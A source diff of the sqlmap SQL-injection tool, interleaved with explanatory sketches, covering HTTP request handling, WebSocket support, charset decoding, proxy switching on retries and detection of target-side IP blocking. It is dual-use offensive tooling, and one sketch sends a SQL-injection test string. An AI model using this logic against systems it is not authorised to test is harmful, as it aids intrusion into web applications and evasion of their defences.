+            errMsg = "invalid URL given for sitemap ('%s')" % url
+            raise SqlmapSyntaxException, errMsg
+
+        for match in re.finditer(r"<loc>\s*([^<]+)", content or ""):
+            if abortedFlag:
+                break
+            url = match.group(1).strip()
+            if url.endswith(".xml") and "sitemap" in url.lower():
+                if kb.followSitemapRecursion is None:
+                    message = "sitemap recursion detected. Do you want to follow? [y/N] "
+                    test = readInput(message, default="N")
+                    kb.followSitemapRecursion = test[0] in ("y", "Y")
+                if kb.followSitemapRecursion:
+                    parseSitemap(url, retVal)
+            else:
+                retVal.add(url)
+
+    except KeyboardInterrupt:
+        abortedFlag = True
+        warnMsg = "user aborted during sitemap parsing. sqlmap "
+        warnMsg += "will use partial list"
+        logger.warn(warnMsg)
+
+    return retVal
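The new parser simply pulls <loc> entries out of the sitemap body with a regular expression and recurses into nested sitemap indexes. A self-contained sketch of the extraction step (the sample XML is made up):

# Self-contained sketch of the <loc> extraction used above.
import re

content = """<?xml version="1.0" encoding="UTF-8"?>
<urlset>
  <loc>http://www.example.com/index.php?id=1</loc>
  <loc> http://www.example.com/nested-sitemap.xml </loc>
</urlset>"""

urls = set()
for match in re.finditer(r"<loc>\s*([^<]+)", content):
    url = match.group(1).strip()
    if url.endswith(".xml") and "sitemap" in url.lower():
        print("would recurse into nested sitemap: %s" % url)
    else:
        urls.add(url)

print(sorted(urls))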
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

 lib/request/basic.py (mode changed: normal file → executable file)
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -15,6 +15,7 @@ import zlib

 from lib.core.common import extractErrorMessage
 from lib.core.common import extractRegexResult
+from lib.core.common import getPublicTypeMembers
 from lib.core.common import getUnicode
 from lib.core.common import readInput
 from lib.core.common import resetCookieJar

@@ -26,10 +27,10 @@ from lib.core.data import logger
 from lib.core.enums import HTTP_HEADER
 from lib.core.enums import PLACE
 from lib.core.exception import SqlmapCompressionException
+from lib.core.settings import BLOCKED_IP_REGEX
 from lib.core.settings import DEFAULT_COOKIE_DELIMITER
 from lib.core.settings import EVENTVALIDATION_REGEX
 from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
-from lib.core.settings import ML
 from lib.core.settings import META_CHARSET_REGEX
 from lib.core.settings import PARSE_HEADERS_LIMIT
 from lib.core.settings import VIEWSTATE_REGEX

@@ -37,6 +38,7 @@ from lib.parse.headers import headersParser
 from lib.parse.html import htmlParser
 from lib.utils.htmlentities import htmlEntities
 from thirdparty.chardet import detect
+from thirdparty.odict.odict import OrderedDict

 def forgeHeaders(items=None):
     """
@@ -50,10 +52,36 @@ def forgeHeaders(items=None):
         if items[_] is None:
             del items[_]

-    headers = dict(conf.httpHeaders)
-    headers.update(items or {})
+    headers = OrderedDict(conf.httpHeaders)
+    headers.update(items.items())

-    headers = dict(("-".join(_.capitalize() for _ in key.split('-')), value) for (key, value) in headers.items())
+    class _str(str):
+        def capitalize(self):
+            return _str(self)
+
+        def title(self):
+            return _str(self)
+
+    _ = headers
+    headers = OrderedDict()
+    for key, value in _.items():
+        success = False
+
+        for _ in headers:
+            if _.upper() == key.upper():
+                del headers[_]
+                break
+
+        if key.upper() not in (_.upper() for _ in getPublicTypeMembers(HTTP_HEADER, True)):
+            try:
+                headers[_str(key)] = value  # dirty hack for http://bugs.python.org/issue12455
+            except UnicodeEncodeError:  # don't do the hack on non-ASCII header names (they have to be properly encoded later on)
+                pass
+            else:
+                success = True
+        if not success:
+            key = '-'.join(_.capitalize() for _ in key.split('-'))
+            headers[key] = value

     if conf.cj:
         if HTTP_HEADER.COOKIE in headers:
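The _str subclass above exists because urllib2 normalizes header names through str.capitalize(); a no-op capitalize() preserves non-standard casing (see the referenced Python issue 12455). A standalone sketch of the trick with urllib2 directly (the URL and header name are placeholders, and no request is actually sent):

# Standalone sketch of the case-preserving header trick (Python 2 urllib2).
import urllib2

class _str(str):
    def capitalize(self):
        return _str(self)

    def title(self):
        return _str(self)

req = urllib2.Request("http://www.example.com/", headers={_str("X-CUSTOM-Token"): "value"})
# urllib2 would normally store this as "X-custom-token"; with _str it stays as given
print(req.header_items())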
@@ -72,8 +100,8 @@ def forgeHeaders(items=None):
                 _ = readInput(message, default="Y")
                 kb.mergeCookies = not _ or _[0] in ("y", "Y")

-            if kb.mergeCookies:
-                _ = lambda x: re.sub("(?i)%s=[^%s]+" % (cookie.name, DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, cookie.value), x)
+            if kb.mergeCookies and kb.injection.place != PLACE.COOKIE:
+                _ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(cookie.name), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), x)
                 headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])

                 if PLACE.COOKIE in conf.parameters:

@@ -82,9 +110,9 @@ def forgeHeaders(items=None):
                     conf.httpHeaders = [(item[0], item[1] if item[0] != HTTP_HEADER.COOKIE else _(item[1])) for item in conf.httpHeaders]

             elif not kb.testMode:
-                headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (DEFAULT_COOKIE_DELIMITER, cookie.name, cookie.value)
+                headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, cookie.name, getUnicode(cookie.value))

-        if kb.testMode:
+        if kb.testMode and not conf.csrfToken:
             resetCookieJar(conf.cj)

     return headers
@@ -120,7 +148,7 @@ def checkCharEncoding(encoding, warn=True):
         return encoding

     # Reference: http://www.destructor.de/charsets/index.htm
-    translate = {"windows-874": "iso-8859-11", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1"}
+    translate = {"windows-874": "iso-8859-11", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932"}

     for delimiter in (';', ',', '('):
         if delimiter in encoding:

@@ -137,8 +165,8 @@ def checkCharEncoding(encoding, warn=True):
         encoding = encoding.replace("5589", "8859")  # iso-5589 -> iso-8859
     elif "2313" in encoding:
         encoding = encoding.replace("2313", "2312")  # gb2313 -> gb2312
-    elif "x-euc" in encoding:
-        encoding = encoding.replace("x-euc", "euc")  # x-euc-kr -> euc-kr
+    elif encoding.startswith("x-"):
+        encoding = encoding[len("x-"):]  # x-euc-kr -> euc-kr / x-mac-turkish -> mac-turkish
     elif "windows-cp" in encoding:
         encoding = encoding.replace("windows-cp", "windows")  # windows-cp-1254 -> windows-1254

@@ -173,7 +201,7 @@ def checkCharEncoding(encoding, warn=True):
     except LookupError:
         if warn:
             warnMsg = "unknown web page charset '%s'. " % encoding
-            warnMsg += "Please report by e-mail to %s." % ML
+            warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"
             singleTimeLogMessage(warnMsg, logging.WARN, encoding)
             encoding = None
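The change above extends the alias table and generalizes the "x-" prefix stripping before the charset name is validated. A small sketch of the same normalize-then-lookup idea, with the alias table trimmed down for illustration:

# Sketch of charset-name normalization backed by codecs.lookup().
import codecs

translate = {"windows-874": "iso-8859-11", "unicode": "utf8", "ansi": "ascii", "windows-31j": "cp932"}

def normalize_charset(name):
    name = name.strip().lower()
    name = translate.get(name, name)
    if name.startswith("x-"):
        name = name[len("x-"):]  # e.g. x-euc-kr -> euc-kr
    try:
        return codecs.lookup(name).name
    except (LookupError, ValueError):
        return None

print(normalize_charset("X-MAC-TURKISH"))  # mac-turkish
print(normalize_charset("windows-31j"))    # cp932
print(normalize_charset("bogus-charset"))  # None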
@@ -236,7 +264,7 @@ def decodePage(page, contentEncoding, contentType):

     if (any((httpCharset, metaCharset)) and not all((httpCharset, metaCharset)))\
         or (httpCharset == metaCharset and all((httpCharset, metaCharset))):
-        kb.pageEncoding = httpCharset or metaCharset
+        kb.pageEncoding = httpCharset or metaCharset  # Reference: http://bytes.com/topic/html-css/answers/154758-http-equiv-vs-true-header-has-precedence
         debugMsg = "declared web page charset '%s'" % kb.pageEncoding
         singleTimeLogMessage(debugMsg, logging.DEBUG, debugMsg)
     else:

@@ -246,39 +274,45 @@ def decodePage(page, contentEncoding, contentType):

     # can't do for all responses because we need to support binary files too
     if contentType and not isinstance(page, unicode) and "text/" in contentType.lower():
-        # e.g. Ãëàâà
-        if "&#" in page:
-            page = re.sub(r"&#(\d{1,3});", lambda _: chr(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page)
+        if kb.heuristicMode:
+            kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
+            page = getUnicode(page, kb.pageEncoding)
+        else:
+            # e.g. Ãëàâà
+            if "&#" in page:
+                page = re.sub(r"&#(\d{1,3});", lambda _: chr(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page)

             # e.g. %20%28%29
             if "%" in page:
                 page = re.sub(r"%([0-9a-fA-F]{2})", lambda _: _.group(1).decode("hex"), page)

             # e.g. &
             page = re.sub(r"&([^;]+);", lambda _: chr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 256) < 256 else _.group(0), page)

             kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
             page = getUnicode(page, kb.pageEncoding)

             # e.g. ’…™
             if "&#" in page:
                 def _(match):
                     retVal = match.group(0)
                     try:
                         retVal = unichr(int(match.group(1)))
                     except ValueError:
                         pass
                     return retVal
                 page = re.sub(r"&#(\d+);", _, page)

             # e.g. ζ
             page = re.sub(r"&([^;]+);", lambda _: unichr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 0) > 255 else _.group(0), page)

     return page

 def processResponse(page, responseHeaders):
     kb.processResponseCounter += 1

+    page = page or ""
+
     parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None)

     if conf.parseErrors:

@@ -297,3 +331,7 @@ def processResponse(page, responseHeaders):
                 continue
             conf.paramDict[PLACE.POST][name] = value
             conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % name, r"\g<1>%s" % value, conf.parameters[PLACE.POST])
+
+    if re.search(BLOCKED_IP_REGEX, page):
+        errMsg = "it appears that you have been blocked by the target server"
+        singleTimeLogMessage(errMsg, logging.ERROR)
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -90,7 +90,7 @@ def _comparison(page, headers, code, getRatioValue, pageLength):

     if kb.nullConnection and pageLength:
         if not seqMatcher.a:
-            errMsg = "problem occured while retrieving original page content "
+            errMsg = "problem occurred while retrieving original page content "
             errMsg += "which prevents sqlmap from continuation. Please rerun, "
             errMsg += "and if the problem persists turn off any optimization switches"
             raise SqlmapNoneDataException(errMsg)

@@ -132,8 +132,21 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
         seq1 = seq1[count:]
         seq2 = seq2[count:]

-    seqMatcher.set_seq1(seq1)
-    seqMatcher.set_seq2(seq2)
+    while True:
+        try:
+            seqMatcher.set_seq1(seq1)
+        except MemoryError:
+            seq1 = seq1[:len(seq1) / 1024]
+        else:
+            break
+
+    while True:
+        try:
+            seqMatcher.set_seq2(seq2)
+        except MemoryError:
+            seq2 = seq2[:len(seq2) / 1024]
+        else:
+            break

     ratio = round(seqMatcher.quick_ratio(), 3)
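The change above retries set_seq1()/set_seq2() with a progressively truncated sequence whenever difflib runs out of memory on very large pages. A sketch of the same retry-with-truncation idea as a reusable helper:

# Sketch of the retry-with-truncation pattern used above.
from difflib import SequenceMatcher

def set_sequences(matcher, seq1, seq2):
    while True:
        try:
            matcher.set_seq1(seq1)
        except MemoryError:
            seq1 = seq1[:len(seq1) // 1024]
        else:
            break

    while True:
        try:
            matcher.set_seq2(seq2)
        except MemoryError:
            seq2 = seq2[:len(seq2) // 1024]
        else:
            break

matcher = SequenceMatcher(None)
set_sequences(matcher, "foobar" * 100, "foobaz" * 100)
print(round(matcher.quick_ratio(), 3))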
@@ -1,20 +1,30 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

+import compiler
 import httplib
 import json
+import keyword
 import logging
 import re
 import socket
 import string
+import struct
 import time
+import traceback
 import urllib2
 import urlparse
-import traceback
+
+try:
+    import websocket
+    from websocket import WebSocketException
+except ImportError:
+    class WebSocketException(Exception):
+        pass

 from extra.safe2bin.safe2bin import safecharencode
 from lib.core.agent import agent
@@ -22,10 +32,12 @@ from lib.core.common import asciifyUrl
 from lib.core.common import calculateDeltaSeconds
 from lib.core.common import clearConsoleLine
 from lib.core.common import cpuThrottle
+from lib.core.common import dataToStdout
 from lib.core.common import evaluateCode
 from lib.core.common import extractRegexResult
 from lib.core.common import findMultipartPostBoundary
 from lib.core.common import getCurrentThreadData
+from lib.core.common import getHeader
 from lib.core.common import getHostHeader
 from lib.core.common import getRequestHeader
 from lib.core.common import getUnicode

@@ -61,12 +73,16 @@ from lib.core.enums import REDIRECTION
 from lib.core.enums import WEB_API
 from lib.core.exception import SqlmapCompressionException
 from lib.core.exception import SqlmapConnectionException
+from lib.core.exception import SqlmapGenericException
 from lib.core.exception import SqlmapSyntaxException
+from lib.core.exception import SqlmapTokenException
 from lib.core.exception import SqlmapValueException
 from lib.core.settings import ASTERISK_MARKER
 from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
 from lib.core.settings import DEFAULT_CONTENT_TYPE
+from lib.core.settings import DEFAULT_COOKIE_DELIMITER
 from lib.core.settings import DEFAULT_GET_POST_DELIMITER
+from lib.core.settings import EVALCODE_KEYWORD_SUFFIX
 from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE
 from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
 from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE

@@ -79,6 +95,8 @@ from lib.core.settings import LARGE_CHUNK_TRIM_MARKER
 from lib.core.settings import PAYLOAD_DELIMITER
 from lib.core.settings import PERMISSION_DENIED_REGEX
 from lib.core.settings import PLAIN_TEXT_CONTENT_TYPE
+from lib.core.settings import REPLACEMENT_MARKER
+from lib.core.settings import TEXT_CONTENT_TYPE_REGEX
 from lib.core.settings import UNENCODED_ORIGINAL_VALUE
 from lib.core.settings import URI_HTTP_HEADER
 from lib.core.settings import WARN_TIME_STDEV

@@ -88,8 +106,9 @@ from lib.request.basic import processResponse
 from lib.request.direct import direct
 from lib.request.comparison import comparison
 from lib.request.methodrequest import MethodRequest
-from thirdparty.socks.socks import ProxyError
 from thirdparty.multipart import multipartpost
+from thirdparty.odict.odict import OrderedDict
+from thirdparty.socks.socks import ProxyError

 class Connect(object):
@@ -106,6 +125,13 @@ class Connect(object):
         threadData = getCurrentThreadData()
         threadData.retriesCount += 1

+        if conf.proxyList and threadData.retriesCount >= conf.retries:
+            warnMsg = "changing proxy"
+            logger.warn(warnMsg)
+
+            conf.proxy = None
+            setHTTPProxy()
+
         if kb.testMode and kb.previousMethod == PAYLOAD.METHOD.TIME:
             # timed based payloads can cause web server unresponsiveness
             # if the injectable piece of code is some kind of JOIN-like query

@@ -148,7 +174,7 @@ class Connect(object):

         if not kb.dnsMode and conn:
             headers = conn.info()
-            if headers and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\
+            if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\
                     or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
                 retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
                 if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
@@ -181,13 +207,13 @@ class Connect(object):
        the target URL page content
        """

-       if conf.delay is not None and isinstance(conf.delay, (int, float)) and conf.delay > 0:
+       if isinstance(conf.delay, (int, float)) and conf.delay > 0:
            time.sleep(conf.delay)
        elif conf.cpuThrottle:
            cpuThrottle(conf.cpuThrottle)

        if conf.dummy:
-           return randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())
+           return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None

        threadData = getCurrentThreadData()
        with kb.locks.request:

@@ -215,6 +241,8 @@ class Connect(object):
        crawling = kwargs.get("crawling", False)
        skipRead = kwargs.get("skipRead", False)

+       websocket_ = url.lower().startswith("ws")
+
        if not urlparse.urlsplit(url).netloc:
            url = urlparse.urljoin(conf.url, url)

@@ -248,10 +276,6 @@ class Connect(object):
        # support those by default
        url = asciifyUrl(url)

-       # fix for known issues when using url in unicode format
-       # (e.g. UnicodeDecodeError: "url = url + '?' + query" in redirect case)
-       url = unicodeencode(url)
-
        try:
            socket.setdefaulttimeout(timeout)

@@ -260,7 +284,6 @@ class Connect(object):
                url, params = url.split('?', 1)
                params = urlencode(params)
                url = "%s?%s" % (url, params)
-               requestMsg += "?%s" % params

            elif multipart:
                # Needed in this form because of potential circle dependency
@@ -291,10 +314,14 @@ class Connect(object):
                get = urlencode(get, limit=True)

            if get:
-               url = "%s?%s" % (url, get)
-               requestMsg += "?%s" % get
+               if '?' in url:
+                   url = "%s%s%s" % (url, DEFAULT_GET_POST_DELIMITER, get)
+                   requestMsg += "%s%s" % (DEFAULT_GET_POST_DELIMITER, get)
+               else:
+                   url = "%s?%s" % (url, get)
+                   requestMsg += "?%s" % get

-           if PLACE.POST in conf.parameters and not post and method in (None, HTTPMETHOD.POST):
+           if PLACE.POST in conf.parameters and not post and method != HTTPMETHOD.GET:
                post = conf.parameters[PLACE.POST]

            elif get:

@@ -304,7 +331,7 @@ class Connect(object):
            requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str

            # Prepare HTTP headers
-           headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer})
+           headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host})

            if kb.authHeader:
                headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader

@@ -312,11 +339,16 @@ class Connect(object):
            if kb.proxyAuthHeader:
                headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader

-           headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
-           headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
-           headers[HTTP_HEADER.HOST] = host or getHostHeader(url)
+           if not getHeader(headers, HTTP_HEADER.ACCEPT):
+               headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE

-           if post is not None and HTTP_HEADER.CONTENT_TYPE not in headers:
+           if not getHeader(headers, HTTP_HEADER.HOST) or not target:
+               headers[HTTP_HEADER.HOST] = getHostHeader(url)
+
+           if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING):
+               headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
+
+           if post is not None and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE):
                headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE)

            if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]:
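The checks above only apply default Accept, Host, Accept-Encoding and Content-Type values when the user has not already supplied those headers, using a case-insensitive lookup (sqlmap's own helper is getHeader in lib.core.common). A sketch of such a lookup with an illustrative helper name and dictionary:

# Sketch of a case-insensitive header lookup of the kind the checks above rely on.
def get_header(headers, name):
    for key in headers:
        if key.upper() == name.upper():
            return headers[key]
    return None

headers = {"user-agent": "sqlmap", "Accept-Encoding": "identity"}
print(get_header(headers, "User-Agent"))       # sqlmap
print(get_header(headers, "ACCEPT-ENCODING"))  # identity
print(get_header(headers, "Host"))             # None -> a default would be set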
@@ -330,71 +362,101 @@ class Connect(object):

            if auxHeaders:
                for key, item in auxHeaders.items():
+                   for _ in headers.keys():
+                       if _.upper() == key.upper():
+                           del headers[_]
                    headers[key] = item

            for key, item in headers.items():
                del headers[key]
                headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding)

+           url = unicodeencode(url)
            post = unicodeencode(post, kb.pageEncoding)

-           if method:
-               req = MethodRequest(url, post, headers)
-               req.set_method(method)
+           if websocket_:
+               ws = websocket.WebSocket()
+               ws.connect(url, header=("%s: %s" % _ for _ in headers.items() if _[0] not in ("Host",)), cookie=cookie)  # WebSocket will add Host field of headers automatically
+               ws.send(urldecode(post or ""))
+               page = ws.recv()
+               ws.close()
+               code = ws.status
+               status = httplib.responses[code]
+               class _(dict):
+                   pass
+               responseHeaders = _(ws.getheaders())
+               responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]
+
+               requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items())
+               requestMsg += "\n%s" % requestHeaders
+
+               if post is not None:
+                   requestMsg += "\n\n%s" % getUnicode(post)
+
+               requestMsg += "\n"
+
+               threadData.lastRequestMsg = requestMsg
+
+               logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)
            else:
-               req = urllib2.Request(url, post, headers)
+               if method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST):
+                   method = unicodeencode(method)
+                   req = MethodRequest(url, post, headers)
+                   req.set_method(method)
+               else:
+                   req = urllib2.Request(url, post, headers)

-               requestHeaders += "\n".join("%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in req.header_items())
+               requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items())

                if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
                    conf.cj._policy._now = conf.cj._now = int(time.time())
                    cookies = conf.cj._cookies_for_request(req)
                    requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies))

                if post is not None:
                    if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH):
                        requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post))

                if not getRequestHeader(req, HTTP_HEADER.CONNECTION):
                    requestHeaders += "\n%s: close" % HTTP_HEADER.CONNECTION

                requestMsg += "\n%s" % requestHeaders

                if post is not None:
                    requestMsg += "\n\n%s" % getUnicode(post)

                requestMsg += "\n"

                threadData.lastRequestMsg = requestMsg

                logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)

                conn = urllib2.urlopen(req)

-               if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and conf.aType == AUTH_TYPE.BASIC:
+               if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower():
                    kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION)

                if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION):
|
if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION):
|
||||||
kb.proxyAuthHeader = getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION)
|
kb.proxyAuthHeader = getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION)
|
||||||
|
|
||||||
# Return response object
|
# Return response object
|
||||||
if response:
|
if response:
|
||||||
return conn, None, None
|
return conn, None, None
|
||||||
|
|
||||||
# Get HTTP response
|
# Get HTTP response
|
||||||
if hasattr(conn, 'redurl'):
|
if hasattr(conn, 'redurl'):
|
||||||
page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\
|
page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\
|
||||||
else Connect._connReadProxy(conn)) if not skipRead else None
|
else Connect._connReadProxy(conn)) if not skipRead else None
|
||||||
skipLogTraffic = kb.redirectChoice == REDIRECTION.NO
|
skipLogTraffic = kb.redirectChoice == REDIRECTION.NO
|
||||||
code = conn.redcode
|
code = conn.redcode
|
||||||
else:
|
else:
|
||||||
page = Connect._connReadProxy(conn) if not skipRead else None
|
page = Connect._connReadProxy(conn) if not skipRead else None
|
||||||
|
|
||||||
code = code or conn.code
|
code = code or conn.code
|
||||||
responseHeaders = conn.info()
|
responseHeaders = conn.info()
|
||||||
responseHeaders[URI_HTTP_HEADER] = conn.geturl()
|
responseHeaders[URI_HTTP_HEADER] = conn.geturl()
|
||||||
page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
|
page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
|
||||||
status = getUnicode(conn.msg)
|
status = getUnicode(conn.msg)
|
||||||
|
|
||||||
if extractRegexResult(META_REFRESH_REGEX, page) and not refreshing:
|
if extractRegexResult(META_REFRESH_REGEX, page) and not refreshing:
|
||||||
url = extractRegexResult(META_REFRESH_REGEX, page)
|
url = extractRegexResult(META_REFRESH_REGEX, page)
|
||||||
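As an aside to the WebSocket branch added in the hunk above: the patched code sends the URL-decoded request body over the socket and reads back a single response frame. A minimal standalone sketch of that flow, assuming the third-party websocket-client package (imported as websocket) and a purely illustrative echo endpoint:

    # Sketch of the WebSocket request flow added above; the endpoint URL and
    # payload are made up, and websocket-client must be installed separately.
    import websocket

    def send_over_websocket(url, payload, extra_headers=None):
        ws = websocket.WebSocket()
        # websocket-client adds the Host header itself, so only extras are passed
        ws.connect(url, header=["%s: %s" % (k, v) for k, v in (extra_headers or {}).items()])
        ws.send(payload)        # raw (already urldecoded) request body
        page = ws.recv()        # single response frame
        code = ws.status        # handshake status code, as used in the patch above
        ws.close()
        return page, code

    if __name__ == "__main__":
        print(send_over_websocket("ws://echo.example.com/", "id=1 AND 1=1"))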
@@ -428,13 +490,13 @@ class Connect(object):
pass

# Explicit closing of connection object
- if not conf.keepAlive:
+ if conn and not conf.keepAlive:
try:
if hasattr(conn.fp, '_sock'):
conn.fp._sock.close()
conn.close()
except Exception, msg:
- warnMsg = "problem occured during connection closing ('%s')" % msg
+ warnMsg = "problem occurred during connection closing ('%s')" % msg
logger.warn(warnMsg)

except urllib2.HTTPError, e:

@@ -459,8 +521,9 @@ class Connect(object):
page = page if isinstance(page, unicode) else getUnicode(page)

code = e.code
- threadData.lastHTTPError = (threadData.lastRequestUID, code)

+ kb.originalCode = kb.originalCode or code
+ threadData.lastHTTPError = (threadData.lastRequestUID, code)
kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1

status = getUnicode(e.msg)

@@ -480,7 +543,7 @@ class Connect(object):

logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)

- if e.code == httplib.UNAUTHORIZED:
+ if e.code == httplib.UNAUTHORIZED and not conf.ignore401:
errMsg = "not authorized, try to provide right HTTP "
errMsg += "authentication type and valid credentials (%d)" % code
raise SqlmapConnectionException(errMsg)

@@ -510,25 +573,35 @@ class Connect(object):
debugMsg = "got HTTP error code: %d (%s)" % (code, status)
logger.debug(debugMsg)

- except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, ProxyError, SqlmapCompressionException), e:
+ except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, httplib.ResponseNotReady, struct.error, ProxyError, SqlmapCompressionException, WebSocketException), e:
tbMsg = traceback.format_exc()

if "no host given" in tbMsg:
warnMsg = "invalid URL address used (%s)" % repr(url)
raise SqlmapSyntaxException(warnMsg)
- elif "forcibly closed" in tbMsg:
+ elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg:
warnMsg = "connection was forcibly closed by the target URL"
elif "timed out" in tbMsg:
+ if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
+ singleTimeWarnMessage("there is a possibility that the target (or WAF) is dropping 'suspicious' requests")
warnMsg = "connection timed out to the target URL"
elif "URLError" in tbMsg or "error" in tbMsg:
warnMsg = "unable to connect to the target URL"
